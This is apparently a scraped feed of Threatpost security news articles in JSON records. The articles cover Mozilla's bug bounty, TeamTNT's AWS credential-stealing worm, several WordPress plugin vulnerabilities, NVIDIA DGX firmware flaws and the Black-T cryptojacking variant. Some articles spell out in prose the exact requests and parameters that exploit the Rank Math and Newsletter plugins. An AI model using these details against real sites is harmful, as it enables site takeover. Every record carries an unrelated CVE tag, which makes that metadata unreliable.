\u201cTo celebrate the 15 years of the 1.0 release of Firefox, we are making significant enhancements to the web bug bounty program.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIn addition, Mozilla announced that over the past six months, it has added new in-scope \u201ccritical websites\u201d and services for its program. This includes:\n\n * [Autograph](<https://github.com/mozilla-services/autograph>) \u2013 a cryptographic signature service that signs Mozilla products.\n * [Lando](<https://moz-conduit.readthedocs.io/en/latest/lando-user.html>) \u2013 Mozilla\u2019s automatic code-landing service which allows users to commit Phabricator revisions to their destination repository.\n * [Phabricator](<https://wiki.mozilla.org/Phabricator>) \u2013 a code management tool used for reviewing Firefox code changes.\n * [Taskcluster](<https://docs.taskcluster.net/docs>) the task execution framework that supports Mozilla\u2019s continuous integration and release processes.\n\nMozilla has also offered new Core sites to its program \u2013 including Firefox Monitor, a site where users can register their email address so that they can be informed if their account details are part of a data breach. 
Firefox Monitor, which made waves after it was announced in 2018 on the heels of Mozilla\u2019s partnership with Cloudflare and Have I Been Pwned (HIBP), went into [testing earlier this year](<https://threatpost.com/mozilla-announces-firefox-monitor-tool-testing-firefox-61/133087/>) and has since been released.\n\nOther added \u201ccore\u201d websites that are now in-scope include:\n\n * [Localization](<https://mozilla-l10n.github.io/localizer-documentation/>) \u2013 a service contributors can use to help localize Mozilla products.\n * [Payment Subscription](<https://github.com/mozilla/subhub>) \u2013 a service that is used as the interface in front of the payment provider (Stripe).\n * [Firefox Private Network](<https://private-network.firefox.com/>) \u2013 a site from which users can download a desktop extension that helps secure and protect connections everywhere Firefox is used.\n * [Ship It](<https://wiki.mozilla.org/ReleaseEngineering/Applications/Ship_It>) \u2013 a system that accepts requests for releases from humans and translates them into information and requests that Mozilla\u2019s Buildbot-based release automation can process.\n * [Speak To Me](<https://github.com/mozilla/speech-proxy>) \u2013 Mozilla\u2019s Speech Recognition API.\n\nMozilla has continually increased rewards for bug bounty vulnerabilities over the years \u2013 the last time [being in 2015](<https://threatpost.com/mozilla-bug-bounty-payouts-going-up/113264/>). Mozilla started its [web bounty program](<https://threatpost.com/behind-numbers-mozillas-bug-bounty-program-092811/75701/>) in December 2010 and offered rewards of up to $3,000 for certain kinds of vulnerabilities reported in those sites.\n\n_**Is MFA enough to protect modern enterprises in the peak era of data breaches? How can you truly secure consumer accounts? Prevent account takeover? 
Find out: Catch our free, on-demand **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=post>)_**, \u201cTrends in Fortune 1000 Breach Exposure\u201d to hear advice from breach expert Chip Witt of SpyCloud. **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=post>)_**.**_\n\n**Share this article:**\n\n * [Editor's Picks](<https://threatpost.com/category/editors-picks/>)\n * [Web Security](<https://threatpost.com/category/web-security/>)\n", "cvss3": {}, "published": "2019-11-20T21:04:32", "type": "threatpost", "title": "Mozilla Bug Bounty Program Doubles Payouts, Adds Firefox Monitor", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2019-11-20T21:04:32", "id": "THREATPOST:BED35CFCFED307909DB60602551982A6", "href": "https://threatpost.com/mozilla-bug-bounty-program-doubles-payouts-adds-firefox-monitor/150489/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:21:12", "description": "A cryptomining worm from the group known as TeamTNT is spreading through the Amazon Web Services (AWS) cloud and collecting credentials. Once the logins are harvested, the malware logs in and deploys the XMRig mining tool to mine Monero cryptocurrency.\n\nAccording to researchers at Cado Security, the worm also deploys a number of openly available malware and offensive security tools, including \u201cpunk.py,\u201d a SSH post-exploitation tool; a log cleaning tool; the Diamorphine rootkit; and the Tsunami IRC backdoor.\n\nIt is, they said, the first threat observed in the wild that specifically targets AWS for cryptojacking purposes. 
However, it also carries out more familiar fare.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe worm also steals local credentials, and scans the internet for misconfigured Docker platforms,\u201d according to a [Monday posting](<https://www.cadosecurity.com/2020/08/17/teamtnt-the-first-crypto-mining-worm-to-steal-aws-credentials/>). \u201cWe have seen the attackers\u2026compromise a number of Docker and Kubernetes systems.\u201d\n\nAs more businesses embrace cloud and container environments, it has opened up a new attack surface for cybercriminals via misconfiguration. That said, cryptomining threats taking aim at Docker and Kubernetes aren\u2019t new. Attackers continue to scan for [publicly accessible, open Docker/Kubernetes servers](<https://threatpost.com/docker-registries-malware-data-theft/152734/>) in an automated fashion, and then exploit them in order to set up their own containers and execute malware on the victim\u2019s infrastructure.\n\nUsually that malware is a cryptominer of some kind, [as seen in April](<https://threatpost.com/self-propagating-malware-docker-ports/154453/>) in a Bitcoin-mining campaign using the Kinsing malware. 
Sometimes the threat is more evolved, as seen in July, when a fresh [Linux backdoor called Doki](<https://threatpost.com/icedid-trojan-rebooted-evasive-tactics/158425/>) was seen infesting Docker servers to set the scene for any number of malware-based attacks, from denial-of-service/sabotage to information exfiltration to ransomware.\n\nHowever, the focus on AWS in this latest set of campaigns \u2013 which [were also flagged](<https://twitter.com/malwrhunterteam/status/1256664761997148161>) by MalwareHunterTeam \u2013 is unique, Cado researchers said.\n\n## **Attacking AWS**\n\nThe attack starts with targeting the way that AWS stores credentials in an unencrypted file at ~/.aws/credentials, and additional configuration details in a file at ~/.aws/config.\n\n\u201cThe code to steal AWS credentials is relatively straightforward \u2013 on execution it uploads the default AWS credentials and config files to the attackers\u2019 server, sayhi.bplace[.]net,\u201d researchers explained. \u201cCurl is used to send the AWS credentials to TeamTNT\u2019s server.\u201d\n\nInterestingly, though the script is written to be a worm, the automated portion of the attack didn\u2019t seem to be in full operation during the security firm\u2019s analysis.\n\n\u201cWe sent credentials created by CanaryTokens.org to TeamTNT, however have not seen them in use yet,\u201d according to the post. \u201cThis indicates that TeamTNT either manually assess and use the credentials, or any automation they may have created isn\u2019t currently functioning.\u201d\n\nThe script that anchors TeamTNT\u2019s worm is repurposed code from the aforementioned Kinsing malware, researchers said, which was originally used to scan for misconfigured Docker APIs, then spin up Docker images and install itself. 
They added that copying code from other tools is common in this area of cybercrime.\n\n\u201cIn turn, it is likely we will see other worms start to copy the ability to steal AWS credentials files too,\u201d they said. \u201cWhilst these attacks aren\u2019t particularly sophisticated, the numerous groups out there deploying cryptojacking worms are successful at infecting large amounts of business systems.\u201d\n\n## **TeamTNT \u2013 It\u2019s Dynamite**\n\nAs far as attribution, TeamTNT announces itself in numerous references within the worm\u2019s code, according to researchers, plus the group uses a domain called teamtnt[.]red. That domain hosts malware, and the homepage is entitled \u201cTeamTNT RedTeamPentesting.\u201d\n\nTeamTNT has been prolific, and was spotted originally earlier in the year. In April, Trend Micro [observed](<https://www.trendmicro.com/vinfo/hk-en/security/news/virtualization-and-cloud/coinminer-ddos-bot-attack-docker-daemon-ports>) the group attacking Docker containers.\n\nAn examination by Cado of one of the mining pools yielding information about the systems that the AWS-capable worm has compromised showed that for the one pool, there were 119 compromised systems, across AWS, Kubernetes clusters and Jenkins build servers.\n\n\u201cSo far we have seen two different Monero wallets associated with these latest attacks, which have earned TeamTNT about three XMR,\u201d researchers explained. \u201cThat equates to only about $300, however this is only one of their many campaigns.\u201d\n\nCado researchers suggested that to thwart such attacks, businesses should identify which systems are storing AWS credential files and delete them if they aren\u2019t needed. 
Also, review network traffic for any connections to mining pools or those sending the AWS credentials file over HTTP; and, use firewall rules to limit any access to Docker APIs.\n\n_It\u2019s the age of remote working, and businesses are facing new and bigger cyber-risks \u2013 whether it\u2019s collaboration platforms in the crosshairs, evolving insider threats or issues with locking down a much broader footprint. Find out how to address these new cybersecurity realities with our complimentary _[_Threatpost eBook_](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)**_, 2020 in Security: Four Stories from the New Threat Landscape_**_, presented in conjunction with Forcepoint. We redefine \u201csecure\u201d in a work-from-home world and offer compelling real-world best practices. _[_Click here to download our eBook now_](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)_._\n", "cvss3": {}, "published": "2020-08-18T14:14:12", "type": "threatpost", "title": "AWS Cryptojacking Worm Spreads Through the Cloud", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-08-18T14:14:12", "id": "THREATPOST:0A238D67F7286BA41103801846210F7A", "href": "https://threatpost.com/aws-cryptojacking-worm-cloud/158427/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:21:46", "description": "Newsletter, a WordPress plugin with more than 300,000 installations, has a pair of vulnerabilities that could lead to code-execution and even site takeover.\n\nThe Newsletter plugin offers site admins a visual editor that can be used to create newsletters and email campaigns from within WordPress. 
According to Wordfence, the issues are a reflected cross-site scripting (XSS) vulnerability and a PHP object-injection vulnerability, both of which can be rectified by updating to the latest version of Newsletter, v.6.8.2.\n\nThe first bug is an authenticated reflected XSS problem (CVE pending), which is a medium-severity issue ranking 6.5 on the CvSS scale. Successful exploitation could allow logged-in attackers to inject malicious code into a web window.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cDespite the fact that [this type of bug] requires an attacker to trick a victim into performing a specific action (such as clicking a specially crafted link), they can still be used to inject backdoors or add malicious administrative users,\u201d according to Wordfence. \u201cIf an attacker tricked a victim into sending a request containing a malicious JavaScript using either of these methods, the malicious JavaScript would be decoded and executed in the victim\u2019s browser.\u201d\n\nAccording to Wordfence, the specific issue arises because vulnerable versions of Newsletter use an AJAX function, tnpc_render_callback, to display edited blocks based on a set of options sent in the AJAX request. However these options aren\u2019t filtered, but are instead passed directly on to a second function, restore_options_from_request, which displays the blocks using the render_block function, according to [the analysis](<https://www.wordfence.com/blog/2020/08/newsletter-plugin-vulnerabilities-affect-over-300000-sites/>), released Monday.\n\n\u201cAs such, it was possible for an attacker to get malicious JavaScript to display in multiple ways,\u201d researchers explained in the post.\n\nFor instance, one method of exploitation would be to send a POST request to wp-admin/admin-ajax.php with the action parameter set to tnpc_render, the b parameter set to html and the options parameter set to arbitrary JavaScript, according to Wordfence. 
Or, the options parameter could be set to an empty array options[]=, and the encoded_options parameter set to a base64-encoded JSON string containing arbitrary JavaScript. In both cases, JavaScript would be rendered in a logged-in user\u2019s browser.\n\nThe second bug (the CVE is also pending on this one) is a high-severity PHP object-injection bug, carrying a severity ranking of 7.5 on the CvSS scale. The vulnerability could be used to inject a PHP object that in turn could be processed by code from another plugin or theme, and used to execute arbitrary code, upload files or \u201cany number of other tactics that could lead to site takeover,\u201d the firm warned.\n\n\u201cAlthough the Newsletter editor did not allow lower-level users to save changes to a given newsletter, the same tnpc_render_callback AJAX function was still accessible to all logged-in users, including subscribers,\u201d according to Wordfence. \u201cThis introduced a PHP object-injection vulnerability via the restore_options_from_request function.\u201d\n\nIn terms of methods of exploitation, Wordfence researchers explained that the __destruct function is used by many sites to automatically delete files and \u201cclean up\u201d once a pre-defined, legitimate process is completed. 
An example would be a script on an e-commerce site that calculates product prices, stores a log of that action, and then deletes the log when it\u2019s done.\n\nIf this code were running on a site that also contained the PHP object injection vulnerability, an attacker could delete the wp-config.php file containing the WordPress site\u2019s core configuration settings by sending a specially crafted payload.\n\n\u201cThe deletion of the wp-config.php file would reset the site and allow an attacker to take over by pointing the site\u2019s new configuration to a remote database under their control,\u201d explained Wordfence.\n\nThe researchers added that to be successful, an attacker would need to know which plugins are installed on a given site \u2013 which can be uncovered with scanning tools, but which means that the bug would be unlikely to be exploited by an automatic script or in bulk.\n\n## **WordPress Plugin Bugs Proliferate**\n\nWordPress plugins are no strangers to security vulnerabilities, some of which can be critical. For instance, last week [just such a bug was found](<https://threatpost.com/critical-rce-flaw-wordpress-plugin-on-70k-sites/157824/>) in a WordPress plugin called Comments \u2013 wpDiscuz, which is installed on more than 70,000 websites. 
The flaw gives unauthenticated attackers the ability to upload arbitrary files (including PHP files) and ultimately execute remote code on vulnerable website servers.\n\nEarlier in July, [it was discovered that the](<https://threatpost.com/advertising-plugin-wordpress-full-site-takeovers/157283/>) Adning Advertising plugin for WordPress, a premium plugin with over 8,000 customers, contains a critical remote code-execution vulnerability with the potential to be exploited by unauthenticated attackers.\n\nIn May, Page Builder by SiteOrigin, a WordPress plugin with a million active installs that\u2019s used to build websites via a drag-and-drop function, [was found to harbor](<https://threatpost.com/wordpress-page-builder-bugs-takeover/155659/>) two flaws that could allow full site takeover.\n\nMeanwhile in April, it was revealed that legions of website visitors could be infected with drive-by malware, among other issues, thanks to a [CSRF bug in Real-Time Search and Replace](<https://threatpost.com/wordpress-plugin-bug-100k-websites-compromise/155230/>).\n\n_**Complimentary Threatpost Webinar**__: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c**[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**\u201d brings top cloud-security experts from Microsoft and __Fortanix together to explore how **Confidential Computing** is a game changer for securing dynamic cloud data and preventing IP exposure. Join us **[Wednesday Aug. 12 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) **for this** FREE **live webinar with Dr. David Thaler, software architect, Microsoft and Dr Richard Searle, security architect, Fortanix \u2013 both with the Confidential Computing Consortium. 
**[Register Now](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**._\n", "cvss3": {}, "published": "2020-08-04T18:11:18", "type": "threatpost", "title": "Newsletter WordPress Plugin Opens Door to Site Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-08-04T18:11:18", "id": "THREATPOST:158524EA6F79769C547CC6A407EF6E78", "href": "https://threatpost.com/newsletter-wordpress-plugin-site-takeover/158025/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:08:58", "description": "Two high-severity vulnerabilities in Post Grid, a WordPress plugin with more than 60,000 installations, open the door to site takeovers, according to researchers. To boot, nearly identical bugs are also found in Post Grid\u2019s sister plug-in, Team Showcase, which has 6,000 installations.\n\nThe issues are a cross-site scripting (XSS) flaw as well as a PHP object-injection issue. Both bugs are pending CVE numbers, and both are high-severity, rating 7.5 out of 10 on the CvSS vulnerability rating scale.\n\nPost Grid, true to its name, allows users to display their posts in a grid layout; meanwhile, Team Showcase offers a way to easily highlight an organization\u2019s team members. Both allowed the import of custom layouts, and used nearly identical \u2013 and vulnerable \u2013 functions for doing so, according to Ram Gall, researcher with Wordfence.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe XSS bug would allow an attacker to supply a source parameter pointing to a crafted malicious payload hosted elsewhere. 
The function would then open the file containing the payload, decode it and create a new page layout based on its contents.\n\n\u201cThe created layout included a custom_scripts section, and an attacker could add malicious JavaScript to the custom_css portion of this section,\u201d explained Gall, [in a posting](<https://www.wordfence.com/blog/2020/10/high-severity-vulnerabilities-in-post-grid-and-team-showcase-plugins/>) on Monday. \u201cThis would then be executed whenever an administrative user edited the layout or a visitor visited a page based on the layout.\u201d\n\nThe upshot is that attackers could use the malicious JavaScript to add a malicious administrator, add a backdoor to plugin or theme files, or steal the administrator\u2019s session information \u2013 all of which are paths to complete takeover of a site.\n\nTriggering an exploit is also somewhat trivial.\n\n\u201cIn both cases, a logged-in attacker with minimal permissions such as subscriber could trigger the functions by sending an AJAX request, with the action set to post_grid_import_xml_layouts for the Post Grid plugin or team_import_xml_layouts for the Team Showcase plugin, with each action triggering a function with the same name,\u201d Gall explained.\n\nThe second issue, the PHP object-injection bug, arises in the import function because it unserialized the payload supplied in the source parameter. An attacker could therefore execute arbitrary code, delete or write files, or perform any number of other actions which could lead to site takeover.\n\nTo trigger the flaw, \u201can attacker could craft a string that would be unserialized into an active PHP object,\u201d Gall explained. 
\u201cAlthough neither plugin utilized any vulnerable magic methods, if another plugin using a vulnerable magic method was installed, Object injection could be used by an attacker.\u201d\n\nBoth vulnerabilities would typically require the attacker to have an account with at least subscriber level privileges \u2013 but there\u2019s a loophole.\n\n\u201cHowever, sites using a plugin or theme that allowed unauthenticated visitors to execute arbitrary shortcodes would be vulnerable to unauthenticated attackers,\u201d Gall added.\n\nThe plugins\u2019 developer, PickPlugins, has issued patches, so web admins should upgrade as soon as possible. The fixed versions are Post Grid v. 2.0.73 and Team Showcase v. 1.22.16.\n\nThese are the latest in the line of faulty WordPress plugins that have come to light this year. In September, a high-severity flaw in the Email Subscribers & Newsletters plugin by Icegram [was found to affect](<https://threatpost.com/wordpress-plugin-flaw/159172/>) more than 100,000 WordPress websites.\n\n[Earlier in August](<https://threatpost.com/critical-flaws-wordpress-quiz-plugin-site-takeover/158379/>), a plugin that is designed to add quizzes and surveys to WordPress websites patched two critical vulnerabilities. The flaws could be exploited by remote, unauthenticated attackers to launch varying attacks \u2013 including fully taking over vulnerable websites. [Also in August,](<https://threatpost.com/newsletter-wordpress-plugin-site-takeover/158025/>) Newsletter, a WordPress plugin with more than 300,000 installations, was discovered to have a pair of vulnerabilities that could lead to code-execution and even site takeover.\n\nAnd, [researchers in July warned](<https://threatpost.com/critical-rce-flaw-wordpress-plugin-on-70k-sites/157824/>) of a critical vulnerability in a WordPress plugin called Comments \u2013 wpDiscuz, which is installed on more than 70,000 websites. 
The flaw gave unauthenticated attackers the ability to upload arbitrary files (including PHP files) and ultimately execute remote code on vulnerable website servers.\n\n[**On October 14 at 2 PM ET**](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)** Get the latest information on the rising threats to retail e-commerce security and how to stop them. **[**Register today**](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)** for this FREE Threatpost webinar, \u201c**[**Retail Security: Magecart and the Rise of e-Commerce Threats.**](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)**\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 
14, 2-3 PM ET for this **[**LIVE **](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)**webinar.**\n", "cvss3": {}, "published": "2020-10-05T21:11:44", "type": "threatpost", "title": "Post Grid WordPress Plugin Flaws Allow Site Takeovers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-10-05T21:11:44", "id": "THREATPOST:8E52FA6620F4FFE6ED3A412867239F2B", "href": "https://threatpost.com/wordpress-plugin-flaws/159856/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-29T23:39:12", "description": "NVIDIA released a patch for a critical bug in its high-performance line of DGX servers that could open the door for a remote attacker to take control of and access sensitive data on systems typically operated by governments and Fortune-100 companies.\n\nIn all, NVIDIA [issued nine patches](<https://nvidia.custhelp.com/app/answers/detail/a_id/5010>), each fixing flaws in firmware used by DGX high-performance computing (HPC) systems, which are used for processor-intensive artificial intelligence (AI) tasks, machine learning and data modeling. All of the flaws are tied to the firmware that runs on the DGX servers\u2019 AMI baseboard management controller (BMC), the component that provides remote, out-of-band monitoring and management of the servers.\n\n\u201cAttacks can be remote (in case of internet connectivity), or if bad guys can root one of the boxes and get access to the BMC they can use the out of band management network to PWN the entire datacenter,\u201d wrote researcher Sergey Gordeychik who is credited for finding the bugs. 
\u201cIf you have access to OOB, it is game is over for the target.\u201d \n[](<https://threatpost.com/newsletter-sign/>)\n\nGiven the high-stake computing jobs typically running on the HPC systems, the researcher noted an adversary exploiting the flaw could \u201cpoison data and force models to make incorrect predictions or infect an AI model.\u201d\n\n## **No Patch Until 2021 for One Bug **\n\nNVIDIA said a patch fixing one high-severity bug (CVE\u20112020\u201111487), specifically impacting its DGX A100 server line, would not be available until the second quarter of 2021. The vulnerability is tied to a hard-coded RSA 1024 key with weak ciphers that could lead to information disclosure. A fix for the same bug (CVE\u20112020\u201111487), impacting other DGX systems (DGX-1, DGX-2) is available.\n\n\u201cTo mitigate the security concerns,\u201d NVIDIA wrote, \u201climit connectivity to the BMC, including the web user interface, to trusted management networks.\u201d\n\n## **Bugs Highlight Weaknesses in AI and ML Infrastructure**\n\n\u201cWe found a number of vulnerable servers online, which triggered our research,\u201d the researcher told Threatpost. The bugs were disclosed Wednesday and presented as part of a [presentation](<https://codeblue.jp/2020/en/speakers/?content=undefined>) \u201c[Vulnerabilities of Machine Learning Infrastructure](<https://codeblue.jp/2020/en/speakers/>)\u201d at [CodeBlue 2020](<https://codeblue.jp/2020/en/>), a security conference in Tokyo, Japan.\n\nDuring the session Gordeychik demonstrated how NVIDIA DGX GPU servers used in machine learning frameworks (Pytorch, Keras and Tensorflow), data processing pipelines and applications such as medical imaging and face recognition powered CCTV \u2013 could be tampered with by an adversary.\n\nThe researcher noted, other vendors are also likely impacted. \u201cInteresting thing here is the supply chain. NVIDIA uses a BMC board by Quanta Computers, which is based on AMI software. 
So to fix issues [NVIDIA] had to push several vendors to get a fix.\u201d\n\nThose vendors include:\n\n * IBM (BMC Advanced System Management)\n * Lenovo (ThinkServer Management Module)\n * Hewlett-Packard Enterprise Megarac\n * Mikrobits (Mikrotik)\n * Netapp\n * ASRockRack IPMI\n * ASUS ASMB9-iKVM\n * DEPO Computers\n * TYAN Motherboard\n * Gigabyte IPMI Motherboards\n * Gooxi BMC\n\n## **Nine CVEs**\n\nAs for the actual patches issued by NVIDIA on Wednesday, the most serious is tracked as CVE\u20112020\u201111483 and is rated critical. \u201cNVIDIA DGX servers contain a vulnerability in the AMI BMC firmware in which the firmware includes hard-coded credentials, which may lead to elevation of privileges or information disclosure,\u201d according to the security bulletin.\n\nVulnerable NVIDIA DGX server models impacted include DGX-1, DGX-2 and DGX A100.\n\nFour of the NVIDIA bugs were rated high-severity (CVE\u20112020\u201111484, CVE\u20112020\u201111487, CVE\u20112020\u201111485, CVE\u20112020\u201111486) with the most serious of the four tracked as [CVE\u20112020\u201111484](<https://nvidia.custhelp.com/app/answers/detail/a_id/5010>). \u201cNVIDIA DGX servers contain a vulnerability in the AMI BMC firmware in which an attacker with administrative privileges can obtain the hash of the BMC/IPMI user password, which may lead to information disclosure,\u201d the chipmaker wrote.\n\nThree of the other patched vulnerabilities were rated medium severity and one low.\n\n\u201cHackers are well aware of AI and ML infrastructure issues and use ML infrastructure in attacks,\u201d Gordeychik said.\n", "cvss3": {}, "published": "2020-10-29T23:15:17", "type": "threatpost", "title": "NVIDIA Patches Critical Bug in High-Performance Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-10-29T23:15:17", "id": "THREATPOST:7229E2AD26BA4F6395ACBFE184C783EF", "href": "https://threatpost.com/nvidia-patches-critical-bug-in-hpc/160762/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:26:52", "description": "A pair of security vulnerabilities in the WordPress search engine optimization (SEO) plugin, known as Rank Math, could allow remote cybercriminals to elevate privileges and install malicious redirects onto a target site, according to researchers. It\u2019s a WordPress plugin with more than 200,000 installations.\n\nAccording to researchers with Wordfence, one of the flaws is critical (10 out of 10 on the CVSSv3 vulnerability severity scale). It could allow an unauthenticated attacker to update arbitrary metadata. This can be abused to grant or revoke administrative privileges for any registered user on the site.\n\nThe second vulnerability is characterized as high-severity (7.4 on the severity scale) and could enable an unauthenticated attacker to create redirects from almost any location on the site to any destination of their choice.\n\nWordfence disclosed the bugs to the developer of the add-on on March 24 (its full name is \u201cWordPress SEO Plugin \u2013 Rank Math\u201d) \u2013 and CVE tracking numbers are forthcoming, researchers said, [in an analysis](<https://www.wordfence.com/blog/2020/03/critical-vulnerabilities-affecting-over-200000-sites-patched-in-rank-math-seo-plugin/>) released Tuesday. 
A patch is now available in the latest version, 1.0.41.1, so Web administrators should update their sites.\n\n**Critical Metadata Flaw**\n\nRank Math allows users to update the metadata on website posts \u2013 which is where the bug lies, according to a technical analysis published on Tuesday by Wordfence.\n\nThe plugin registers a REST-API endpoint, rankmath/v1/updateMeta, the firm explained in its breakdown. This calls a function called \u201cupdate_metadata,\u201d which could be used to update the slug on existing posts, or could be used to delete or update metadata for posts, comments and terms. This endpoint also allows for updating metadata for users.\n\nThe issue is that in non-patched versions, the endpoint fails to include a permissions check on users making changes.\n\n\u201cWordPress user permissions are stored in the usermeta table, which meant that an unauthenticated attacker could grant any registered user administrative privileges by sending a $_POST request to wp-json/rankmath/v1/updateMeta, with an objectID parameter set to the User ID to be modified, an objectType parameter set to user, a meta[wp_user_level] parameter set to 10, and a meta[wp_capabilities][administrator] parameter set to 1,\u201d the analysis noted.\n\nA nefarious type could also completely revoke an existing administrator\u2019s privileges by sending a similar request with a meta[wp_user_level] parameter and a meta[wp_capabilities] parameter set to empty values, the researchers added, effectively locking administrators out of their own sites.\n\n\u201cNote that these attacks are only the most critical possibilities. Depending on the other plugins installed on a site, the ability to update post, term and comment metadata could potentially be used for many other exploits such as cross-site scripting (XSS),\u201d the researchers commented.\n\n**Malicious Redirect Bonanza**\n\nThe Rank Math plugin also comes with an optional module that can be used to create redirects on a site. 
An administrator might do this to direct visitors away from pages under construction, for example.\n\nIn order to add this feature, the plugin registers a REST-API endpoint for this too, called \u201crankmath/v1/updateRedirection.\u201d And, like the other vulnerability, this endpoint fails to execute a permissions check, according to Wordfence \u2013 which means that an attacker could easily create new redirects or modify existing redirects. As such, the attack could essentially be used to prevent access to almost all of a site\u2019s existing content, according to the analysis, by simply redirecting visitors to a malicious site.\n\n\u201cIn order to perform this attack, an unauthenticated attacker could send a $_POST request to rankmath/v1/updateRedirection with a redirectionUrl parameter set to the location they wanted the redirect to go to, a redirectionSources parameter set to the location to redirect from, and a hasRedirect parameter set to true,\u201d Wordfence researchers wrote.\n\nThere is, however, a caveat that accounts for the lower-severity rating of the bug: \u201cThe redirect could not be set to an existing file or folder on the server, including the site\u2019s main page,\u201d according to the analysis. \u201cThis limited the damage to some extent in that, while an attacker could create a redirect from most locations on the site, including new locations, or any existing post or page other than the homepage, they could not redirect visitors immediately upon accessing the site.\u201d\n\nWeb admins can mitigate the issues by building in a \u201cpermission_callback\u201d on any REST-API endpoints, or by updating to the latest version of the plug-in.\n\nWordPress plugins continue to make headlines as weak links that can lead to website compromises. 
For instance, in March, a critical vulnerability in a WordPress plugin known as \u201cThemeREX Addons\u201d [was found](<https://threatpost.com/themerex-wordpress-plugin-remote-code-execution/153592/>) that could open the door for remote code execution in 44,000 websites.\n\nAlso in March, two vulnerabilities \u2013 including a high-severity flaw \u2013 [were patched](<https://threatpost.com/wordpress-plugin-bug-popup-builder/153715/>) in a popular WordPress plugin called Popup Builder. The more severe flaw could enable an unauthenticated attacker to inject malicious JavaScript into a popup \u2013 potentially opening up more than 100,000 websites to takeover.\n\nIn February, popular WordPress plugin Duplicator, which has more than 1 million active installations, [was discovered to have](<https://www.wordfence.com/blog/2020/03/zero-day-vulnerability-in-themerex-addons-now-patched/>) an unauthenticated arbitrary file download vulnerability that was being attacked. And, earlier that month, a critical flaw in a popular WordPress plugin that helps make websites compliant with the General Data Protection Regulation (GDPR) [was disclosed](<https://threatpost.com/critical-wordpress-plugin-bug-afflicts-700k-sites/152871/>); it could enable attackers to modify content or inject malicious JavaScript code into victim websites. It affected 700,000 sites.\n", "cvss3": {}, "published": "2020-04-01T18:03:01", "type": "threatpost", "title": "Critical WordPress Plugin Bug Can Lock Admins Out of Websites", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-04-01T18:03:01", "id": "THREATPOST:1973BA4B294E79D107940CF5DA67CB9A", "href": "https://threatpost.com/critical-wordpress-plugin-bug-lock-admins-out/154354/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:09:04", "description": "Researchers have discovered the latest cryptojacking malware gambit from TeamTNT, called Black-T. The variant builds on the group\u2019s typical approach, with a few new \u2014 and sophisticated \u2014 extras.\n\nTeamTNT is known for its targeting of Amazon Web Services (AWS) credentials, to break into the cloud and use it to mine for the [Monero](<https://threatpost.com/monero-cybercrime-mining-malware/141116/>) cryptocurrency. But according to researchers with Palo Alto Networks\u2019 Unit 42, with [Black-T](<https://unit42.paloaltonetworks.com/black-t-cryptojacking-variant/>), the group has added in additional capabilities to its tactics, techniques and procedures (TTPs). 
These include the addition of sophisticated network scanners; the targeting of competitor XMR mining tools on the network; and the use of password scrapers.\n\nWhat TeamTNT plans to do with the saved passwords and additional capabilities is still unclear, but the development signals that the group doesn\u2019t plan to slow down anytime soon.\n\nIn August, [TeamTNT was identified by researchers](<https://threatpost.com/aws-cryptojacking-worm-cloud/158427/>) as the first cryptojacking group to specifically target AWS. With increasingly sophisticated TTPs, the cybercriminal gang appears to be gaining steady momentum. Just last month, TeamTNT was discovered to have been leveraging a common open-source cloud monitoring tool called [Weave Scope, to infiltrate the cloud](<https://threatpost.com/teamtnt-remote-takeover-cloud-instances/159075/>) and execute commands without breaching the server.\n\nBlack-T represents a notable jump forward in the operation\u2019s sophistication, researchers said.\n\nOnce deployed, the first order of business for Black-T is to disable any other malware competing for processing power, including Kinsing, Kswapd0, ntpd miner, redis-backup miner, auditd miner, Migration miner, the Crux worm and Crux worm miner. Ironically, the fact that TeamTNT identified these competitors in their malware gives security professionals a critical heads-up to be on the lookout for potential threats from these groups, Unit 42 said.\n\nThis kind of cryptojacking turf warfare isn\u2019t new, but it appears to be accelerating.\n\n\u201cThe battle for cloud resources will continue well into the future,\u201d Nathaniel 